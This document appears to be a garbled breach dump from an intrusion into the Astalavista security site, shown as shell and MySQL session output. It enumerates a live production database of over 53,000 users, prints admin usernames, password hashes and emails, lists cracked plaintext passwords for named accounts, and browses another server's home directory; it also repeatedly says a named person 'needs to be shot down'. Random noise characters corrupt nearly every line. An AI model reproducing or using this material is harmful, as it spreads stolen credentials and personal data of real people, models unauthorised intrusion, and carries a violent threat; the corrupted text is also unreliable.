. s3 e9 C" B1 t& B7 Q5 o <language>en-us</language>
: C1 i/ [3 ] { F0 }. p% h# J <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>9 J) v& O! |, i" b0 g
<docs>http://blogs.law.harvard.edu/tech/rss</docs>5 R8 Q% G) R( O. s0 x3 B! `# u4 p
<generator>Astalavista.com</generator>3 L7 c8 P% Q2 I$ I @
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
8 _4 m3 \, e) T" x7 P </channel># e8 C9 I8 g# ]5 q% @: N& E/ q
</rss>’;
9 @( R1 y9 h" l* r* [5 ~4 X! d
1 |4 w. ?# c1 r, }2 A if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
& S$ `. O6 q6 I# Z unlink (FULLPATH . ‘/feed/exploits.xml’);! a: t' T% J& e# }1 G" f6 I& j% d
}/ q% x8 W; D2 \! o
4 h& _* d8 s( T file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
& C8 g Q8 v6 L Y% [[snip]
1 ]1 l- \- h$ x$ |3 Y
9 ?- I3 W9 l, I% a4 Ysh-3.2$ cat exploits.sh
' @& y: S& N( x; I8 Z( [, D#!/bin/sh
# X1 J5 v$ H* e3 v/ a& P c6 o9 Q1 u/ c
( b4 k: d' J2 N###########################################################+ o% P1 g, |- z* d$ t* D
# #4 _2 j* h+ [0 Y k' K9 x% C
# Title: milw0rm exploits adder #0 k( r( E1 ^/ J x% r
# Description: Add all milw0rm exploits to the #
' |. y+ U4 a: i4 W# Astalavista.com database #
6 e. H4 R5 y. f( W4 v0 W. e9 X E( t# #
* v0 J6 g, x$ g5 h+ O, B; V# Company: Astalavista Group #
! O* m$ m7 ^8 Z6 R/ C6 B: q$ t# Author: Paulo M. Santos #0 B# |; _( q: V% \5 X4 X
# E-Mail: 链接标记paulo.santos@astalavista.ch #
7 Q, K1 `/ d) Z+ P/ k# #
- i. ^, s# `5 I% S9 j/ s###########################################################
7 o7 W* n' Y; V! e: @* L6 n! Y/ @& R, M
# path
8 H6 s& J7 Z; h2 s- k& E' Othis_path=/home/com/public_html/modifications/cronjobs! I1 D$ u5 H2 y: a6 o
" V }. m/ c+ B# change directory2 }& i a# V/ H7 O; o- w1 A& j
cd $this_path- a. D9 S( T; c' s* X; @
cd tmp/
d5 e3 X: o# S! U4 f$ b/ D% X: T
% Q; l3 d9 C1 N# `4 v1 V# delete files4 P! l8 \9 y) v3 N2 X; Z
rm -rf milw0rm.tar.* &
* `" Q8 ^% m) B0 J5 ?9 n% `8 erm -rf milw0rm/ &: `3 H' i% W: ?" a
8 D7 U: s. S# h5 J# wget milw0rm paket
+ X. L1 Q y4 T9 V1 G; ?wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
7 `5 _4 A6 A/ _! n3 r& ^8 E* {) ]5 I1 N0 r
# extract milw0rm paket
0 e3 m0 Q% M5 R$ `0 V8 atar -xvf milw0rm.tar.bz2" w8 w, C' G4 t: y( L8 a! I
6 P# K. X- H! v1 G" h/ n# change owner
3 t/ {. e% B6 zchown -R com .$ L: d& r3 o& C: h$ i
chgrp -R com .9 S" ^8 L1 ]5 n( h$ f4 J
, j! f1 d- a' U! U& `5 @ D$ F# execute php script
n/ B- d; Y; \# vcd $this_path, T/ o+ ?% @' F
php -q exploits.php
9 }3 [. I8 v6 J/ |7 P3 l* u
! g. `3 K! o F. C% E. U& j# delete files& o8 h4 k W b. r6 ?
rm -rf tmp/milw0rm.tar.*5 s4 T9 [1 F" u4 r- V& k8 C3 z+ c5 @
rm -rf tmp/milw0rm/: @3 P8 B3 Z' w6 ]2 C) ]2 ]: u5 j. D
9 j% r3 b8 m- Csh-3.2$ echo “Paulo M. Santos needs to be shot down.”
7 Y& _! y4 E7 h XPaulo M. Santos needs to be shot down.3 Q, y. M% O5 d" k( z
- r* w1 t. c, [$ R/ @" M8 E
mysql -u contrexxuser2 -p5 x c5 N9 n0 g) h. _
Enter password:
2 K0 h' B1 F) q5 ?& bWelcome to the MySQL monitor. Commands end with ; or \g.
; p, `7 ]/ b3 @% I+ ~2 OYour MySQL connection id is 261694& d. W D+ o. t
Server version: 5.0.45-community-log MySQL Community Edition (GPL)+ `3 K8 }+ x. i% H
) _* W/ l5 P WType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 ~; U. k! \: c* c* C3 Z4 l' G( R) E7 B
mysql> show databases;
5 Z& K* ^7 w- G+ g' E+——————–+; ]) W/ v O. K$ Y
| Database |" [' p. Q- u& s; @- G( K {
+——————–+1 t: D" |2 D) `( {% W- s L
| information_schema |
6 r9 [/ g' ~0 R p5 S1 o' e7 H| com_contrexx2 |
7 T w; w7 g- W& X| com_contrexx2_live |
% H1 ]! v" b) Y% w* Z| test |; I% e) T) l- U7 F0 {
+——————–+: Y$ `7 H5 f9 ?1 [! \' O! `' [/ ~- ?
4 rows in set (0.00 sec)
9 e. O: o" z" B; a' `9 P+ K3 o9 t) r& h% k- }6 P) f5 s2 N4 Z
mysql> use com_contrexx2_live7 r/ y+ d3 j C/ {
Database changed
7 T: j4 t5 \, `- P, imysql> show tables;" Y) |0 ~# ^* |" R& k, d
+————————————————–+: {. z7 k# d r1 x4 u7 J* {* o
| Tables_in_com_contrexx2_live |* n" k0 ?( w2 K! W7 \$ t" f. c
+————————————————–+
( J" j: x5 e# D& A7 E/ H| cc_banner_counter |4 O- z4 V7 d! g$ A8 H
| cc_search_counter |
6 b" w g# i& t8 h| contrexx_access_group_dynamic_ids |# P' N& s6 I: i& P$ r; p6 W( {
| contrexx_access_group_static_ids |
5 K7 x( j& g$ d) i& @| contrexx_access_rel_user_group |: v d" l- p& P7 s. f, b5 o
| contrexx_access_settings |4 w2 d5 N( p/ _7 |+ F: h# V3 i2 H
| contrexx_access_user_attribute | I7 {5 i8 M/ d( Q0 _" ~$ L2 p% E
| contrexx_access_user_attribute_name |/ J4 H2 E7 w) Z4 H3 Y. g
| contrexx_access_user_attribute_value |
! ^& ]$ J% ]1 S- w% R| contrexx_access_user_core_attribute |9 W6 d. _& u. }% O4 k& M/ q4 p
| contrexx_access_user_groups |
/ ` @8 |& ?2 E8 T3 o; ?4 a6 ^| contrexx_access_user_mail |- w3 ~" h& D2 H0 Q3 w
| contrexx_access_user_profile |% l, B. h& j$ U G& ] z/ v
| contrexx_access_user_title |
$ x: Q! q7 n" M3 ^0 w$ _% i| contrexx_access_user_validity |
@. G8 E! \2 P6 {, z( ?| contrexx_access_users |% q4 ?+ S0 S, |
| contrexx_backend_areas |# q! E' h% z' e; H: C" W
| contrexx_backups |
' B. J/ i! w- F& }| contrexx_content |# [- P E0 A; f6 O7 i( n
| contrexx_content_history |$ H/ `0 [4 g0 r9 k% a% C( N0 {3 {% i
| contrexx_content_logfile |
1 S k3 G& i7 l% l" Z| contrexx_content_navigation |, V4 F6 {7 ?( C
| contrexx_content_navigation_history |5 O* u) Q# j* @' q5 G
| contrexx_ids |& T1 r, o/ W6 d5 B3 q# N
| contrexx_languages | s. a0 c) \; N* E
| contrexx_lib_country |
0 W" V' s' ] ~% h- m v, Z| contrexx_log |; R0 [7 {- N: ]# L: ]
| contrexx_module_alias_source |: _' J' K2 H$ S' C, X4 l+ w0 B8 ]
| contrexx_module_alias_target |! \8 k5 C+ Q% }0 x7 R
| contrexx_module_block_blocks |
' U; |, m7 j. z }2 D: a# a| contrexx_module_block_rel_lang |
1 {$ P& w- F0 O0 @$ w( L* E| contrexx_module_block_rel_pages |
v) d! C. T# N w( I$ _5 F% f2 ]| contrexx_module_block_settings |
' u- N: B/ G/ X: B. j1 q| contrexx_module_blog_categories |
& H' ~0 e4 \7 [1 s, ?8 }4 N2 l0 J| contrexx_module_blog_comments |9 m2 F6 w' _& B, ~! T/ f+ Q" I
| contrexx_module_blog_message_to_category |. ^+ j' d @( U8 q3 L. ?7 X% \: ]; [
| contrexx_module_blog_messages |$ m( Z( J& U* f0 j e# { Q
| contrexx_module_blog_messages_lang |) Z. x. i! A, _2 z
| contrexx_module_blog_networks | h0 G$ x/ N# l
| contrexx_module_blog_networks_lang |& l: t& A* e& X
| contrexx_module_blog_settings |
1 J2 O1 a2 {8 a# E| contrexx_module_blog_votes |' B; V# v1 F1 L; M: H
| contrexx_module_calendar |- S; x: n3 K0 o! ^8 H2 `! n
| contrexx_module_calendar_access |9 T- N- {3 q `5 J+ Z
| contrexx_module_calendar_categories |9 b5 p+ A3 O2 z8 K
| contrexx_module_calendar_form_data |' G, k* R) s! R: l+ B* \
| contrexx_module_calendar_form_fields |& ~; Z1 {/ F6 z4 w
| contrexx_module_calendar_registrations |8 s. e+ ?* e9 h$ X! N9 ^; E, B# g
| contrexx_module_calendar_settings |* ~' t$ x Z- j" ^& O8 ]$ g
| contrexx_module_calendar_style |
, F0 i3 W4 |4 E9 || contrexx_module_contact_form |$ _, t( A+ Q0 J4 K6 i0 u
| contrexx_module_contact_form_data |% [# e, H1 i% D: ~9 y# {
| contrexx_module_contact_form_field |
6 @0 Y1 G7 H9 G5 {7 c& a* d! t| contrexx_module_contact_settings |0 S& J2 B* N8 @* m
| contrexx_module_data_categories |
( b4 {' {, S" c| contrexx_module_data_message_to_category |; C, p e+ R, Y% O: T" M
| contrexx_module_data_messages |$ j' }8 d, Z7 d! s* D7 S; h" s
| contrexx_module_data_messages_lang |& @) G. A1 o9 k: y/ c$ n
| contrexx_module_data_placeholders |
9 u. Y1 E. {6 t3 c( R| contrexx_module_data_settings | D2 m: a: I$ |! d9 c6 `2 Z
| contrexx_module_directory_access |
' ?* G+ H( S; V+ g' y5 G7 o: L, ]| contrexx_module_directory_categories |$ ]* W5 H, h3 Q4 @: t9 W# N
| contrexx_module_directory_dir |
' q; T9 e, g7 ]) A- ?| contrexx_module_directory_inputfields |5 I5 e5 P6 b9 c% a) s& J
| contrexx_module_directory_levels |5 q# R) s6 s% [) N) N( @5 A
| contrexx_module_directory_mail |
" j `8 o- ]. W7 ?6 u| contrexx_module_directory_rel_dir_cat |! {4 q0 c" A1 D
| contrexx_module_directory_rel_dir_level |
7 H2 D9 _ v9 ^5 [| contrexx_module_directory_settings |
: k$ u( Y/ ]$ C| contrexx_module_directory_settings_google |
8 {' C8 m; l4 l6 O( o| contrexx_module_directory_vote |
, j: O* O" ~7 P| contrexx_module_docsys |
5 @8 M! d8 K8 N4 x I| contrexx_module_docsys_categories |
# U/ H! [: p0 O7 H8 p| contrexx_module_egov_configuration |9 D5 c* u% B# x1 c
| contrexx_module_egov_orders | t5 m2 }0 G3 W. O
| contrexx_module_egov_product_calendar |) J* N; ]! v& q. Z F
| contrexx_module_egov_product_fields |' i) ]7 i" J; i2 Z
| contrexx_module_egov_products |# H* Q7 F/ h. d ^6 \! H
| contrexx_module_egov_settings |
8 I/ X1 r2 D; c" H" u, X: i| contrexx_module_exploits |5 @' _4 C7 m, d8 _% [3 ~; w
| contrexx_module_exploits_categories |
x5 W3 r5 R8 }# }: ~8 T! V+ O W| contrexx_module_feed_category |
& L$ k, u3 t% j* F1 {) K2 C| contrexx_module_feed_news |
" {/ j) P$ \. x| contrexx_module_feed_newsml_association |
- J, _# [' Q; \0 M| contrexx_module_feed_newsml_categories |
% O/ O5 F) W% a. a8 y| contrexx_module_feed_newsml_documents |
/ H# A5 ^5 l1 @0 P G8 F| contrexx_module_feed_newsml_providers |& l) D* `) K- Z1 j6 p
| contrexx_module_forum_access |. _9 X8 x( F3 O" c- E
| contrexx_module_forum_categories |
' f3 z4 |0 {6 a) W6 q# Q3 w! I3 D| contrexx_module_forum_categories_lang |
: G# L d: G2 x/ H. T| contrexx_module_forum_notification |! w- O3 S5 o! v, ~8 y( F) M
| contrexx_module_forum_postings |) T" M( k+ S( |' G6 d* Q
| contrexx_module_forum_rating |7 F4 t3 i- w; |9 a
| contrexx_module_forum_settings |, Z0 I/ P; b: O9 u/ Y" E4 d; B
| contrexx_module_forum_statistics |
, U0 ]3 ~( q. r" f| contrexx_module_gallery_categories |: K; j0 O/ r" E8 b7 i, }
| contrexx_module_gallery_comments |
, g6 m' n! h* [- ^ H* S| contrexx_module_gallery_language |
; B) t7 I: x T+ @| contrexx_module_gallery_language_pics |% O' V: l7 s* F4 E; @
| contrexx_module_gallery_pictures |
# b1 e) ^: E4 ?2 j( M$ R2 }| contrexx_module_gallery_settings |, p, D8 I$ x5 ?, P) I6 l
| contrexx_module_gallery_votes |! q- D" p/ Q$ I" g
| contrexx_module_guestbook |+ j1 M- H [0 L$ \
| contrexx_module_guestbook_settings |
7 W" T; D0 p7 v2 ]| contrexx_module_livecam |
; ~; H S# N3 }| contrexx_module_livecam_settings |
# |% c& _! p4 P4 [) `| contrexx_module_market |
7 k5 u+ O4 f5 ]% B2 ~4 d( K| contrexx_module_market_access |
) ^) f& M& c) }! t) Z| contrexx_module_market_categories |
2 C3 T, C+ K4 o J+ ]0 h| contrexx_module_market_mail |
# f: R5 ~* T1 w" x| contrexx_module_market_paypal |
( w! Z% Y, R7 k, C7 W| contrexx_module_market_settings |
* b+ G* J5 p; |8 p4 O* ^| contrexx_module_market_spez_fields |
: T, @* |$ x2 V2 f7 z* Z* |0 ] X| contrexx_module_mediadir_access |
1 y' o! ]% b8 c$ T& |) p| contrexx_module_mediadir_categories |
' B) I2 H/ H6 L3 Q) r0 m| contrexx_module_mediadir_comments |2 ]) {: B$ A/ I T1 o3 l# V2 U; J/ ~
| contrexx_module_mediadir_dir |9 n" O- X9 g3 {0 O! [4 u
| contrexx_module_mediadir_inputfields |
+ j" c0 q2 _) _+ l| contrexx_module_mediadir_levels |
6 [: N+ J! d% q% i: E. m* F" A* k4 r. e| contrexx_module_mediadir_mail |
: @( i% G: p/ L6 B/ s| contrexx_module_mediadir_rel_dir_cat |3 r5 K3 _- e6 S! I c
| contrexx_module_mediadir_rel_dir_level |
; Z! n/ t0 t$ X T! K| contrexx_module_mediadir_reports |
0 Z! W" @; M* R5 M| contrexx_module_mediadir_settings |
* \' q' K9 D6 e. E) T% d0 I| contrexx_module_mediadir_settings_google |
6 D7 S; n& Y1 b( J6 I+ N8 `4 K& Z3 N| contrexx_module_mediadir_vote |
0 E3 ~/ K( _4 |5 h9 K& T" \| contrexx_module_memberdir_directories |! ~! y; W# t2 e7 |1 f4 }
| contrexx_module_memberdir_name |
# t' k* P" a- t' s' C) z' H7 Q| contrexx_module_memberdir_settings |% G( n+ u# x0 r1 ]
| contrexx_module_memberdir_values |
r! B, h: Y& ^" F5 v- }| contrexx_module_nettools_allowed_groups |/ i1 }, b4 N* j" ?% R2 b7 x8 X9 a
| contrexx_module_nettools_settings |
; w6 q! j' j d( w# W% c| contrexx_module_news |7 e/ @4 C, P+ D1 ~& s3 Y
| contrexx_module_news_access |) I/ p+ i7 U# o% p
| contrexx_module_news_categories |
/ y$ M! r, V' d( L| contrexx_module_news_settings |
0 D1 w9 i: i! h( u. s. V2 p| contrexx_module_news_teaser_frame |
4 Y& w* _5 A' W" I| contrexx_module_news_teaser_frame_templates |* h1 Z4 |/ c% }! k& q+ R9 ]. J
| contrexx_module_news_ticker |
6 i9 n8 V* h d+ Z0 L1 ~' Y* E% i| contrexx_module_newsletter |9 b6 Y- ]* X- e x& @: G' i5 D
| contrexx_module_newsletter_attachment |+ A1 }8 t' p* C" R1 L
| contrexx_module_newsletter_category |( o5 K/ l; Q& s8 W) z# [8 i5 r
| contrexx_module_newsletter_confirm_mail |
# r* h# c+ e; p4 @3 M| contrexx_module_newsletter_rel_cat_news |. A0 {. j4 \3 u
| contrexx_module_newsletter_rel_user_cat |1 }6 q" K! j0 c
| contrexx_module_newsletter_settings |
% p6 p* e# s0 e" f| contrexx_module_newsletter_template |
7 R7 L% _, `$ s: e+ J7 x| contrexx_module_newsletter_tmp_sending |1 T$ x/ a9 @! \ L1 q2 m
| contrexx_module_newsletter_user |
, j2 b6 u$ J; q| contrexx_module_newsletter_user_title |
& T5 `+ y) Q0 T0 d4 k| contrexx_module_onlinetools_defaultports |
% r7 E! q( M2 r2 @| contrexx_module_onlinetools_defaultports_back |
6 f8 V y) q$ k+ s$ T! M2 Y7 e| contrexx_module_onlinetools_geolitecity_blocks |* G3 t) j% S2 B5 w6 Q) S0 q4 l
| contrexx_module_onlinetools_geolitecity_country |
6 B9 u- h& @& r; G$ O| contrexx_module_onlinetools_geolitecity_location |) Q t; @4 g/ Z7 U9 K# Q
| contrexx_module_podcast_category |
, q4 B" v! Y! s2 U8 U: b| contrexx_module_podcast_medium |
6 Y% g, z% l7 r/ f* ]) n9 c| contrexx_module_podcast_rel_category_lang |) |. ^3 F. X7 _" ?
| contrexx_module_podcast_rel_medium_category |# [9 J# ]" S: ]' s( J% R8 ~
| contrexx_module_podcast_settings |
; |" x: E* m& M' p0 w0 m| contrexx_module_podcast_template |
1 z. t# o1 v+ @% X$ I6 k# S7 P| contrexx_module_proxydb |
. f4 ~$ e$ H; j o' P0 ^: }0 X| contrexx_module_recommend |! m3 v$ S7 V) g1 X
| contrexx_module_repository |
) v% |! l' t$ u| contrexx_module_securitynews_cats |
" [! o1 `! x. U2 I' Q2 c$ f0 s/ }6 Q| contrexx_module_securitynews_feeds |2 L0 A/ u/ [- I8 H1 z1 P- |$ H
| contrexx_module_securitynews_news |* w* b. }# L) Y9 E. |7 m$ w
| contrexx_module_shop_categories |; M% ?" ?. o) ^! B5 y
| contrexx_module_shop_config |
- c6 }7 ]2 d; c+ ^| contrexx_module_shop_countries |
, ?/ \: Z V8 a| contrexx_module_shop_currencies |
% T- B5 \7 i& U8 j. z| contrexx_module_shop_customers |4 }) {0 h' q! J6 w/ u
| contrexx_module_shop_importimg |
7 V8 P& S9 i5 h| contrexx_module_shop_lsv |
" `6 u/ C4 f" b8 k5 h| contrexx_module_shop_mail |0 v* |" M0 x8 O A9 y, Z
| contrexx_module_shop_mail_content |
% |" h. ]9 d1 P+ }% A| contrexx_module_shop_manufacturer |
) h+ {& Y: i: ~ V| contrexx_module_shop_order_items |
- u, v5 c: U, z2 v3 _& q| contrexx_module_shop_order_items_attributes |
; b, Y* w6 k1 V d5 }2 z| contrexx_module_shop_orders |/ u/ g2 p7 i1 z- g
| contrexx_module_shop_payment |
; V/ \# r; ^1 M$ m1 || contrexx_module_shop_payment_processors |7 D' W- ]$ p" l3 R+ t5 ^1 j: o0 ]# L% I
| contrexx_module_shop_pricelists |/ g* D' C2 r% G1 I1 o/ q/ L
| contrexx_module_shop_products |3 r/ {% q) V! z9 f G. w1 {
| contrexx_module_shop_products_attributes |4 c ]% F* L0 z4 b
| contrexx_module_shop_products_attributes_name |
1 s, ^$ g4 o {' y0 [: X. M! q7 ^0 e| contrexx_module_shop_products_attributes_value |+ m5 d# H" k T2 A
| contrexx_module_shop_products_downloads |
# }% |0 X2 j4 a f' _% D6 E| contrexx_module_shop_rel_countries |
! ^' r% T1 B4 |& _& ?4 u| contrexx_module_shop_rel_payment |
: s8 H$ F1 [$ O1 D| contrexx_module_shop_rel_shipment |
8 v! s7 c$ y; R3 @- || contrexx_module_shop_shipment_cost |
: j* K2 j# @- K( C8 k| contrexx_module_shop_shipper |* y5 p& j7 T8 X3 W/ b! Q' Q% e n
| contrexx_module_shop_vat |0 o# H8 l4 x6 N- M) H5 C
| contrexx_module_shop_zones |
7 V: u# \, p$ ? p7 q! \| contrexx_module_u2u_address_list |
1 p& R5 g! L0 K w6 ~| contrexx_module_u2u_message_log |1 a- I+ X1 n- Z# B, V" i3 t
| contrexx_module_u2u_sent_messages |
% b9 V6 V$ @% q: a* R| contrexx_module_u2u_settings |
1 r, I) U4 j J6 A| contrexx_module_u2u_user_log |5 k. q6 c* f; b, N
| contrexx_modules |, ^5 E, ~" b* C& V* z2 Y7 o
| contrexx_sessions |
+ P6 j0 g# {7 Y, G| contrexx_settings |' f$ D H7 o: _% P: G' _/ D
| contrexx_settings_smtp |, a: t1 H0 N* J ?
| contrexx_skins |$ A0 D. t8 Y# Q4 R& I5 _
| contrexx_stats_browser |5 w! T8 w, y2 Z W; [ _" {1 q
| contrexx_stats_colourdepth |* L( J8 h0 w: I4 _' ~3 S0 h
| contrexx_stats_config |8 Q1 ]+ \3 f$ a4 \
| contrexx_stats_country |
: s" T" T4 a# i$ g& a2 D; B, u| contrexx_stats_hostname |
* Y5 b+ g" v) W# @5 J| contrexx_stats_javascript |8 o/ N% \2 F* [9 g. R- F
| contrexx_stats_operatingsystem |2 J. r9 `6 S, q2 e0 j/ G+ G, z
| contrexx_stats_referer |, A. E9 w' t# j, }8 ^* C6 e! d
| contrexx_stats_requests |3 |: ^" t* }; y9 n& M
| contrexx_stats_requests_summary |, F( L. z, Y7 o/ F: g+ A! _
| contrexx_stats_screenresolution |" T: Z$ H& c) t0 X1 m) V% V
| contrexx_stats_search |
' y9 C" e& V2 X0 q; F| contrexx_stats_spiders |4 @7 z8 W$ o0 B
| contrexx_stats_spiders_summary |5 m9 Q) s% Q. t1 K
| contrexx_stats_visitors |3 A* U6 I5 q. p* D0 ]3 k! k
| contrexx_stats_visitors_summary |# B; `! z8 w: O$ O- r8 \0 |" f
| contrexx_voting_additionaldata |
' j- L# U6 @! \' N| contrexx_voting_email |
f5 j( `9 Z: L| contrexx_voting_rel_email_system |
3 h4 {4 x* L: ?| contrexx_voting_results |: Y! I! |9 v' ]! d/ O
| contrexx_voting_system |$ X# p* k$ Q( A; q) K* s) L
| foo |5 B' T/ A/ X* D0 w0 S
+————————————————–+
- m. ^0 r7 ]# X0 f227 rows in set (0.01 sec)
* {' n0 t: `2 s/ J- o# j# l. _* |2 O
mysql> select count(*) as skids from contrexx_access_users;
u0 w: t3 r8 O2 \/ ^) @; ~+——-+4 s, r. `, U9 L. ~% {* |
| skids |1 N' p' i' R8 x5 j
+——-+
8 T; X; @' z, W G| 53699 |0 {; d2 p7 k; W" q* K, J8 S
+——-+( _ l* E0 u* t! |6 B% i: H
1 row in set (0.00 sec)
: ?! u- L0 X4 o, c, {7 m
6 f6 B5 e7 k4 G( p# Xmysql> describe contrexx_access_users;8 i" h7 R: M6 L" G
+——————+——————————————+——+—–+————–+—————-+: t3 |+ o& h6 R: F% Z, V
| Field | Type | Null | Key | Default | Extra |
9 s6 ?( h6 [8 I; D$ X1 Z+——————+——————————————+——+—–+————–+—————-+6 Z% r' o: g0 H* U' U3 g n
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
5 k7 f& w9 j5 x" @7 r| is_admin | tinyint(1) unsigned | NO | | 0 | |+ ~; @% A x5 u' {9 ]. B% H
| username | varchar(40) | YES | MUL | NULL | |
. R) w k& i% |) v) x( W| password | varchar(32) | YES | | NULL | |2 V5 g) q; i* w& F
| regdate | int(14) unsigned | NO | | 0 | |) d1 I( s* c$ C, n
| expiration | int(14) unsigned | NO | | 0 | |1 j0 ?9 n# p0 r* v7 }; O- T
| validity | int(10) unsigned | NO | | 0 | |- p6 |' O3 c V
| last_auth | int(14) unsigned | NO | | 0 | |2 V( v3 d! H7 `9 d: F# v
| last_activity | int(14) unsigned | NO | | 0 | |) }% \1 F9 u2 U
| email | varchar(255) | YES | | NULL | |; V5 U' i N+ R! B) ]7 C
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |( o) W3 p! Y* T5 b
| frontend_lang_id | int(2) unsigned | NO | | 0 | |! r( H$ o2 L1 S8 Y3 h; k) R- O
| backend_lang_id | int(2) unsigned | NO | | 0 | |
( z# ^& ?2 M1 r| active | tinyint(1) | NO | | 0 | |8 p- O9 W, j4 i9 `
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
, Z) R; F3 v# J1 S, {5 x| restore_key | varchar(32) | NO | | | |4 a) h2 G0 j7 C( U
| restore_key_time | int(14) unsigned | NO | | 0 | |# i) i( d) p3 x! G" p
| u2u_active | enum(’0′,’1′) | NO | | 1 | |( Y; u2 d, t' l2 @9 P" d4 R4 m% x! q
+——————+——————————————+——+—–+————–+—————-+9 o* W1 k" W1 |4 U9 s5 }$ m
18 rows in set (0.00 sec)7 {0 Q9 J; |; q [, C2 z3 D( F
- }8 N9 S2 x6 D2 o8 q
mysql> select username,password,email from contrexx_access_users where is_admin = 1;1 `) R3 D5 w9 V& j# I& x
+————+———————————-+—————————–+5 ?5 \2 |1 M0 `9 S8 P
| username | password | email |
, j8 u7 y+ m' \+————+———————————-+—————————–+) t+ r9 l; I/ O/ M) z9 _/ @9 `
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
- N6 b9 \1 _9 G$ f" H| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
+ T- F+ V% Q$ p2 R" n' P' `$ L| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
" ^' q" v% [+ Z7 || schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |0 K# Z: K- W( n1 x- O" Q
+————+———————————-+—————————–+/ h5 l& X0 m" b* v/ A8 ~
4 rows in set (0.04 sec)3 j: y+ }% L4 K9 B( L6 A* P1 n' z, w
2 D- |+ {3 R4 a% c* }mysql> exit;
4 M+ u' l% o0 ?! G, GBye" F% z3 @# V" N5 M/ b( `
& c1 u6 K0 c1 L J5 s
[~] There you go, your “team of security and IT professionals” is a joke.
1 i/ X, k3 q$ S, l {
; A S& _- r8 B0 B+——————————+( u; x( ]" G, k3 C) Q' G- w
system:f82BN3+_*
$ E' m! I$ T8 ?2 EBe1er0ph0r:belerophor4astacom3 o& T, n5 e# s' P
prozac:asta4cms!
) k9 C8 |" h1 h" T- [& N/ qcommander:mpbdaagf6m$ L6 J- _! e% b$ Q; y
sykadul:ak29eral! v/ r/ c# x" ] @
+——————————+
5 Z9 z' j8 S+ P3 s" b1 Y8 D( D, ^: z! _9 {7 w2 Q4 f) P, z7 y7 v- L" U4 M
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)9 p5 G# G) B! W& y3 ]; P
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
6 g7 y+ D! t4 @6 F* C5 B0 ?0 q- {
" O$ a; ~* |6 F! q7 t5 y[~] Lets move to astalavista.net now,
4 N3 y# X, J" }& \; N" g3 X
0 N5 U7 x8 S# BFrom <链接标记[url]https://www.astalavista.net/[/url]>:8 c( f2 G+ @ v: Z7 E z
>> Everyone knows that the best defense is a good offense./ e: Q+ W4 r) M- W/ W( a- o
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
1 t$ R f# G0 Y, A/ n& m>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
/ r5 D8 b$ d* k# v1 R8 N>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”9 o0 @( ~/ o2 W
% A6 a# l' \% @. \& B' _* u7 b>> Go ahead, try and hack our server . in a completely legal way!
" a) m& P# T9 l+ G- K: i7 [) }$ v9 z>> Learn by doing: We offer our members tricky tasks and challenges on an* d/ A# C* g" X, E
>> ongoing basis so you can test your knowledge and abilities. You can also$ \2 a; m% @9 n6 }% c' R
>> demonstrate what you.ve mastered by taking part in regular hacker contests7 w$ e# P( M( t- r& F
>> and war games, p- s$ c# \0 i7 O" ~
* ^4 e* D& M) j- f$ n
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
1 I) `7 g: ^, m6 m7 P8 j0 W
f9 G; v( i! P5 N [; Y; D, H[-] Tricky task: Find home dir of astalavista.net) C o2 l8 h6 e- d; _# A
6 C4 }1 @5 X5 |0 G D3 x5 j/ L
sh-3.2$ ls -la ~astanet
; t0 B o/ {4 M! r3 v* ~total 48
2 p" m; f7 s) t) c4 kdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .$ \$ S- ?" e" U! j' M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ d* f- u: P* q8 s* w+ ~& G( t' qdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* o2 ]; f# J( P$ p- I9 n
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history8 z( ?/ j% A( e9 k, g" J+ _
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout9 f3 P# C+ u' A2 q1 v- R
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
/ S. P% ~, ^1 c5 {% s-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc! z4 b$ V0 j1 v1 H5 p
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains6 ~% X3 Y* R) O) b! i
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
# m1 T" {6 E2 C8 E- c; Wdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail$ e4 c) g" t$ B; _7 ~
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 e3 M' L+ g& Q8 X/ i3 v-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
8 z c. `$ b$ J
) x+ |: m& O6 Q Y' W" @9 k: psh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/5 l2 i$ y! N! c9 E! [
sh-3.2$ ls -la
2 b, e8 K4 n1 c! Xtotal 200" C# j) x$ b5 C/ n/ A) b: T/ S
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
0 [: N& y! G3 X B' m- {3 zdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..0 x# P- w. x0 m3 [6 U% Y
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
% P5 F- q( x$ \$ E. p, C8 U+ [drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
